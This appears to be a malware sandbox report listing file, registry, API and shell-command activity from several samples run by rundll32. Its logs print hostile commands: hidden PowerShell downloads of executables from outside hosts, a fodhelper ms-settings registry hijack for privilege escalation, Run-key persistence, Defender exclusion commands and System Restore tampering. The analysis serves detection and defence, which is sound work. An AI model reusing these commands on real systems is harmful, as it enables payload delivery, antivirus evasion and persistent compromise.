\device\namedpipe\pshost.134199906702970088.7036.defaultappdomain.powershell Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288
\device\namedpipe\pshost.134204371861688496.6936.defaultappdomain.powershell Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288
\device\namedpipe\wkssvc Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\47f2.tmp\ÈÒÎÃ.bat Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\public\libraries\config.json Generic Write,Read Attributes
c:\users\public\libraries\config.json Synchronize,Write Attributes
c:\users\public\libraries\svchost.exe Generic Read,Write Data,Write Attributes,Write extended,Append data,Delete,LEFT 262144
c:\users\public\libraries\svchost.exe Synchronize,Write Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_13x2ay40.dxx.psm1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_4clnculs.v4s.psm1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_4eok13rs.ezs.ps1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_502surqg.in2.psm1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_b5nhrh2h.2gn.ps1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_be2nb2hi.yj4.psm1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_c4wxmli5.jlz.psm1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_d2uqfkbm.b30.ps1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_ejgtsinr.y41.ps1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_exshymzz.5wl.psm1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_fi1dsmiz.zii.psm1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_ir1hzpd5.2c0.ps1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_jxu20arf.5im.ps1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_k0rdyisr.5j4.psm1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_lwuy2znm.i30.ps1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_lzoj0iwm.j4u.ps1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_n4ncuyly.cgp.psm1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_oecifclt.osb.ps1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_owtgqofe.53l.psm1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_peuaowrr.w43.psm1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_sygyotlw.twh.ps1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_tidom4ic.qdt.psm1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_tjzehqpq.ubq.ps1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_yazac4sh.y3o.psm1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_zfexr2al.g0s.ps1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_zv35vjga.cwa.ps1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\msi2fe1.tmp Generic Write,Read Attributes
c:\users\user\appdata\local\temp\msi432a0.log Generic Write,Read Attributes
c:\users\user\appdata\local\temp\vcpkg\vcpkg-2020.11.12.exe Generic Read,Write Data,Write Attributes,Write extended,Append data,Delete,LEFT 262144
c:\users\user\appdata\local\temp\vcpkg\vcpkg-2020.11.12.exe Generic Write,Read Attributes,Delete,LEFT 262144
c:\users\user\appdata\local\temp\vcpkg\vcpkg-2020.11.12.exe Generic Write,Read Data,Read Attributes,Delete,LEFT 262144
c:\users\user\appdata\local\temp\vcpkg\vcpkg-2020.11.12.exe Read Attributes,Synchronize,Write Data
c:\users\user\appdata\local\temp\vcpkg\vcpkge09bc766-dbad-4163-8882-9ef5df4a2b81.txt Generic Write,Read Attributes
c:\users\user\appdata\local\vcpkg\config Generic Write,Read Attributes
c:\users\user\appdata\roaming\ob\windows local.exe Generic Read,Write Data,Write Attributes,Write extended,Append data,Delete,LEFT 262144
c:\windows\temp\15293484.ps1 Generic Write,Read Attributes
c:\windows\temp\15298859.ps1 Generic Write,Read Attributes
c:\windows\temp\2155015.ps1 Generic Write,Read Attributes
c:\windows\temp\2160328.ps1 Generic Write,Read Attributes
c:\windows\temp\debug_log.txt Generic Write,Read Attributes

Registry Modifications

Key::Value Data API Name
HKLM\software\wow6432node\microsoft\windows nt\currentversion\systemrestore::systemrestorepointcreationfrequency RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe ⬃뗸䮮ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe 귄풾啺ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 풷퓅啺ǜ RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::proxybypass  RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::intranetname  RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::uncasintranet  RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::autodetect RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe 핳啺ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 䊿핶啺ǜ RegNtPreCreateKey
Show More
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 꿣ȁ獖} RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe @岿棻ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 擝峁棻ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe 嵥棻ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 䞬嵨棻ǜ RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 溹嵯棻ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\windowspowershell\v1.0\powershell.exe 縭巀棻ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe 巡棻ǜ RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasapi32::enablefiletracing RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasapi32::enableautofiletracing RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasapi32::enableconsoletracing RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasapi32::filetracingmask ￿ RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasapi32::consoletracingmask ￿ RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasapi32::maxfilesize  RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasapi32::filedirectory %windir%\tracing RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasmancs::enablefiletracing RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasmancs::enableautofiletracing RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasmancs::enableconsoletracing RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasmancs::filetracingmask ￿ RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasmancs::consoletracingmask ￿ RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasmancs::maxfilesize  RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasmancs::filedirectory %windir%\tracing RegNtPreCreateKey
HKCU\ms-settings\shell\open\command:: "C:\Users\Public\Libraries\svchost.exe" RegNtPreCreateKey
HKCU\ms-settings\shell\open\command::delegateexecute RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\explorer::slowcontextmenuentries RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\5.0\cache\content::cacheprefix RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\5.0\cache\cookies::cacheprefix Cookie: RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\5.0\cache\history::cacheprefix Visited: RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 쉝琡泻ǜ RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 桏⬉ʾ먎Í䈛x茣ǧ䠱O噀ñ뽹ɞ傄ë횎ǜɼ鶝’꾢ʊ캱˜閾ʴ淃⟋ʪ柏ũߙĤᯢV⣳ġjᰂŁ鈄Ğ鍂€ꩠŖ窵ň RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 桐⬉ʾꄍ먎Í䈛x茣ǧ䠱O噀ñ뽹ɞ傄ë횎ǜɼ鶝’꾢ʊ캱˜閾ʴ淃⟋ʪ柏ũߙĤᯢV⣳ġjᰂŁ鈄Ğ鍂€ꩠŖ窵ň RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 騿琹泻ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 姊璛泻ǜ RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe ⏶쁣紽ǜ RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\run::obwallet C:\Users\Ymoxotlr\AppData\Roaming\ob\Windows local.exe RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 빇듂製ǜ RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings::enablenegotiate  RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe ⇺訖ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 䞀⇽訖ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe 졯⋀訖ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe ⪖⋃訖ǜ RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 뚾蹸ꛗǜ RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 昛躉ꛗǜ RegNtPreCreateKey
HKLM\system\controlset001\control\ci\policy::vulnerabledriverblocklistenable RegNtPreCreateKey
HKLM\system\controlset001\control\ci\policy::driverblocklistenable RegNtPreCreateKey
HKLM\system\controlset001\control\ci\config::vulnerabledriverblocklistenable RegNtPreCreateKey
HKLM\system\controlset001\control\ci\config::driverblocklistenable RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 꿖軴ꛗǜ RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\run::obwallet C:\Users\Fwcujizw\AppData\Roaming\ob\Windows local.exe RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe ᐐᯛ꣍ǜ RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe 牓᰺꣍ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 㖾᰿꣍ǜ RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe 烅꜊옚ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 烅꜊옚ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe ܕꞣ옚ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 楮ꞥ옚ǜ RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe Ɪ옚ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe 㩺䟆쨪ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe 衫䟔쨪ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 䟖쨪ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe 騘䟧쨪ǜ RegNtPreCreateKey

Windows API Usage

Category API
Syscall Use
  • ntdll.dll!NtAccessCheck
  • ntdll.dll!NtAccessCheckByType
  • ntdll.dll!NtAddAtomEx
  • ntdll.dll!NtAdjustPrivilegesToken
  • ntdll.dll!NtAlertThreadByThreadId
  • ntdll.dll!NtAllocateLocallyUniqueId
  • ntdll.dll!NtAllocateReserveObject
  • ntdll.dll!NtAlpcAcceptConnectPort
  • ntdll.dll!NtAlpcConnectPort
  • ntdll.dll!NtAlpcConnectPortEx
Show More
  • ntdll.dll!NtAlpcCreatePort
  • ntdll.dll!NtAlpcCreatePortSection
  • ntdll.dll!NtAlpcCreateResourceReserve
  • ntdll.dll!NtAlpcCreateSectionView
  • ntdll.dll!NtAlpcCreateSecurityContext
  • ntdll.dll!NtAlpcDeleteSecurityContext
  • ntdll.dll!NtAlpcQueryInformation
  • ntdll.dll!NtAlpcQueryInformationMessage
  • ntdll.dll!NtAlpcSendWaitReceivePort
  • ntdll.dll!NtAlpcSetInformation
  • ntdll.dll!NtApphelpCacheControl
  • ntdll.dll!NtAssignProcessToJobObject
  • ntdll.dll!NtAssociateWaitCompletionPacket
  • ntdll.dll!NtCancelIoFileEx
  • ntdll.dll!NtCancelTimer2
  • ntdll.dll!NtCancelWaitCompletionPacket
  • ntdll.dll!NtClearEvent
  • ntdll.dll!NtClose
  • ntdll.dll!NtCompareSigningLevels
  • ntdll.dll!NtConnectPort
  • ntdll.dll!NtCreateEvent
  • ntdll.dll!NtCreateFile
  • ntdll.dll!NtCreateIoCompletion
  • ntdll.dll!NtCreateJobObject
  • ntdll.dll!NtCreateKey
  • ntdll.dll!NtCreateMutant
  • ntdll.dll!NtCreatePrivateNamespace
  • ntdll.dll!NtCreateSection
  • ntdll.dll!NtCreateSemaphore
  • ntdll.dll!NtCreateThreadEx
  • ntdll.dll!NtCreateTimer
  • ntdll.dll!NtCreateTimer2
  • ntdll.dll!NtCreateUserProcess
  • ntdll.dll!NtCreateWaitCompletionPacket
  • ntdll.dll!NtCreateWorkerFactory
  • ntdll.dll!NtDelayExecution
  • ntdll.dll!NtDeleteKey
  • ntdll.dll!NtDeviceIoControlFile
  • ntdll.dll!NtDuplicateObject
  • ntdll.dll!NtDuplicateToken
  • ntdll.dll!NtEnumerateKey
  • ntdll.dll!NtEnumerateValueKey
  • ntdll.dll!NtFlushProcessWriteBuffers
  • ntdll.dll!NtFreeVirtualMemory
  • ntdll.dll!NtFsControlFile
  • ntdll.dll!NtGetCachedSigningLevel
  • ntdll.dll!NtGetCompleteWnfStateSubscription
  • ntdll.dll!NtGetContextThread
  • ntdll.dll!NtImpersonateAnonymousToken
  • ntdll.dll!NtLockFile
  • ntdll.dll!NtMapViewOfSection
  • ntdll.dll!NtNotifyChangeKey
  • ntdll.dll!NtOpenDirectoryObject
  • ntdll.dll!NtOpenEvent
  • ntdll.dll!NtOpenFile
  • ntdll.dll!NtOpenKey
  • ntdll.dll!NtOpenKeyEx
  • ntdll.dll!NtOpenMutant
  • ntdll.dll!NtOpenProcess
  • ntdll.dll!NtOpenProcessToken
  • ntdll.dll!NtOpenProcessTokenEx
  • ntdll.dll!NtOpenSection
  • ntdll.dll!NtOpenSemaphore
  • ntdll.dll!NtOpenSymbolicLinkObject
  • ntdll.dll!NtOpenThread
  • ntdll.dll!NtOpenThreadToken
  • ntdll.dll!NtOpenThreadTokenEx
  • ntdll.dll!NtPowerInformation
  • ntdll.dll!NtProtectVirtualMemory
  • ntdll.dll!NtQueryAttributesFile
  • ntdll.dll!NtQueryDebugFilterState
  • ntdll.dll!NtQueryDefaultLocale
  • ntdll.dll!NtQueryDirectoryFile
  • ntdll.dll!NtQueryDirectoryFileEx
  • ntdll.dll!NtQueryEvent
  • ntdll.dll!NtQueryFullAttributesFile
  • ntdll.dll!NtQueryInformationFile
  • ntdll.dll!NtQueryInformationJobObject
  • ntdll.dll!NtQueryInformationProcess
  • ntdll.dll!NtQueryInformationThread
  • ntdll.dll!NtQueryInformationToken
  • ntdll.dll!NtQueryInstallUILanguage
  • ntdll.dll!NtQueryKey
  • ntdll.dll!NtQueryLicenseValue
  • ntdll.dll!NtQueryObject
  • ntdll.dll!NtQueryPerformanceCounter
  • ntdll.dll!NtQuerySecurityAttributesToken
  • ntdll.dll!NtQuerySecurityObject
  • ntdll.dll!NtQuerySymbolicLinkObject
  • ntdll.dll!NtQuerySystemInformation

174 additional items are not displayed above.

Network Winsock2
  • WSASocket
  • WSAStartup
  • WSAttemptAutodialName
Network Winsock
  • accept
  • bind
  • closesocket
  • connect
  • freeaddrinfo
  • getaddrinfo
  • getsockname
  • recv
  • send
  • setsockopt
Show More
  • socket
Process Shell Execute
  • CreateProcess
  • ShellExecute
  • ShellExecuteEx
  • WriteConsole
Anti Debug
  • CheckRemoteDebuggerPresent
  • IsDebuggerPresent
  • NtQuerySystemInformation
User Data Access
  • GetComputerName
  • GetComputerNameEx
  • GetUserDefaultLocaleName
  • GetUserName
  • GetUserNameEx
  • GetUserObjectInformation
Encryption Used
  • BCryptOpenAlgorithmProvider
Other Suspicious
  • AdjustTokenPrivileges
Process Manipulation Evasion
  • NtUnmapViewOfSection
Process Terminate
  • TerminateProcess
Network Wininet
  • HttpOpenRequest
  • HttpQueryInfo
  • HttpSendRequest
  • InternetConnect
  • InternetOpen
  • InternetOpenUrl
  • InternetReadFile
  • InternetSetOption
Network Winhttp
  • WinHttpConnect
  • WinHttpOpen
  • WinHttpOpenRequest
  • WinHttpReceiveResponse
  • WinHttpSendRequest
Network Info Queried
  • GetNetworkParams
Cert Store Read
  • CertOpenStore
Network Urlomon
  • URLDownloadToFile

Shell Command Execution

C:\WINDOWS\SysWOW64\rundll32.exe C:\WINDOWS\system32\rundll32.exe c:\users\user\downloads\36f6413bd3ca800dfc66725d52421babc85b9619_0000793088.,LiQMAxHB
"\47F2.tmp\����.bat"
C:\WINDOWS\system32\chcp.com chcp 65001
C:\WINDOWS\system32\reg.exe Reg.exe delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\SystemRestore" /v "RPSessionInterval" /f
C:\WINDOWS\system32\reg.exe Reg.exe delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\SystemRestore" /v "DisableConfig" /f
Show More
C:\WINDOWS\system32\reg.exe Reg.exe add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "SystemRestorePointCreationFrequency" /t REG_DWORD /d 0 /f
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Unrestricted -NoProfile Enable-ComputerRestore -Drive 'C:\'
C:\WINDOWS\SysWOW64\rundll32.exe C:\WINDOWS\system32\rundll32.exe c:\users\user\downloads\0bf30a10a614207d27df8c8fc8e7b50853a52cc4_0000793088.,LiQMAxHB
"C:\Users\Blotfgdv\AppData\Local\Temp\vcpkg\vcpkg-2020.11.12.exe" x-upload-metrics "C:\Users\Blotfgdv\AppData\Local\Temp\vcpkg\vcpkge09bc766-dbad-4163-8882-9ef5df4a2b81.txt"
C:\WINDOWS\SysWOW64\rundll32.exe C:\WINDOWS\system32\rundll32.exe c:\users\user\downloads\819ce40e357612584bd690fc220921b9d4a8431a_0002931200.,LiQMAxHB
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "& { iwr -Uri 'https://frozi.cc/Stb/Retev.php?bl=RbAFzBhyyCMuMHbMdPLCW013.txt' -OutFile $env:APPDATA\BK245535.exe
C:\WINDOWS\SysWOW64\rundll32.exe C:\WINDOWS\system32\rundll32.exe c:\users\user\downloads\7107fd33026804fb7da9494d952a46d036f49200_0000828928.,LiQMAxHB
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "& { iwr -Uri 'https://vcc-library.uk/Stb/Retev.php?bl=oy7DDikwUmXxyY968EPRE008.txt' -OutFile $env:TEMP\BK707028.exe
C:\WINDOWS\SysWOW64\rundll32.exe C:\WINDOWS\system32\rundll32.exe c:\users\user\downloads\075ce8c6a8190bfa4f9facbb57cdc728e7ba52ea_0000828928.,LiQMAxHB
(NULL) fodhelper.exe
open ms-settings:optionalfeatures
powershell -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Windows\Temp\15298859.ps1"
powershell -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Windows\Temp\15293484.ps1"
msiexec.exe /i C:\Users\Vdwyojnp\AppData\Local\Temp\MSI2FE1.tmp
C:\WINDOWS\system32\tasklist.exe "tasklist"
C:\WINDOWS\SysWOW64\rundll32.exe C:\WINDOWS\system32\rundll32.exe c:\users\user\downloads\b93dc317de9e6f50f25d83df63c6d107591118d1_0000793088.,LiQMAxHB
open powershell.exe -Command "Add-MpPreference -ExclusionPath "C:\Users\Ymoxotlr\AppData\Roaming\ob\" -Force"
open C:\Users\Ymoxotlr\AppData\Roaming\ob\Windows local.exe
open cmd.exe /C powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users\Ymoxotlr\AppData\Roaming\ob' -ErrorAction SilentlyContinue" >nul 2>&1
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "& { iwr -Uri 'https://vcc-library.uk/Stb/Retev.php?bl=yQbDrnzZVH6cCtokqOPRE001.txt' -OutFile $env:TEMP\BK396126.exe
C:\WINDOWS\SysWOW64\rundll32.exe C:\WINDOWS\system32\rundll32.exe c:\users\user\downloads\96c7077d1b99dca84e7f3b5a89e58cb608153ac0_0000843776.,LiQMAxHB
WriteConsole: (NULL)
WriteConsole:
WriteConsole: __ _______
WriteConsole: \ \/ /___ /
WriteConsole: \ / |_ \
WriteConsole: / \ ___) |
WriteConsole: /_/\_\____/
WriteConsole: X3 SOLUTIONS
WriteConsole: External Loader
WriteConsole: ----------------------------------------
WriteConsole: Username:
C:\WINDOWS\system32\getmac.exe getmac
powershell -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Windows\Temp\2160328.ps1"
powershell -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Windows\Temp\2155015.ps1"
open powershell.exe -Command "Add-MpPreference -ExclusionPath "C:\Users\Fwcujizw\AppData\Roaming\ob\" -Force"
open C:\Users\Fwcujizw\AppData\Roaming\ob\Windows local.exe
open cmd.exe /C powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users\Fwcujizw\AppData\Roaming\ob' -ErrorAction SilentlyContinue" >nul 2>&1
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users\Fwcujizw\AppData\Roaming\ob' -ErrorAction SilentlyContinue"
C:\WINDOWS\SysWOW64\rundll32.exe C:\WINDOWS\system32\rundll32.exe c:\users\user\downloads\d661cd9180fefffa8ab4fd42ba8695b485944458_0000856576.,LiQMAxHB
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "& { iwr -Uri 'https://vcc-library.uk/Stb/Retev.php?bl=oy7DDikwUmXxyY968EPRE008.txt' -OutFile $env:TEMP\BK216633.exe
C:\WINDOWS\system32\cmd.exe cmd.exe /c powershell -WindowStyle Hidden -Command "& { iwr -Uri 'https://vcc-library.online/Stb/Retev.php?bl=hSoTjMPgKZmtpimvUjLW012.txt' -OutFile $env:TEMP\BK598146.exe
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c cls
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "& { iwr -Uri 'https://vcc-library.online/Stb/Retev.php?bl=hSoTjMPgKZmtpimvUjLW012.txt' -OutFile $env:TEMP\BK598146.exe

Trending

Most Viewed

Loading...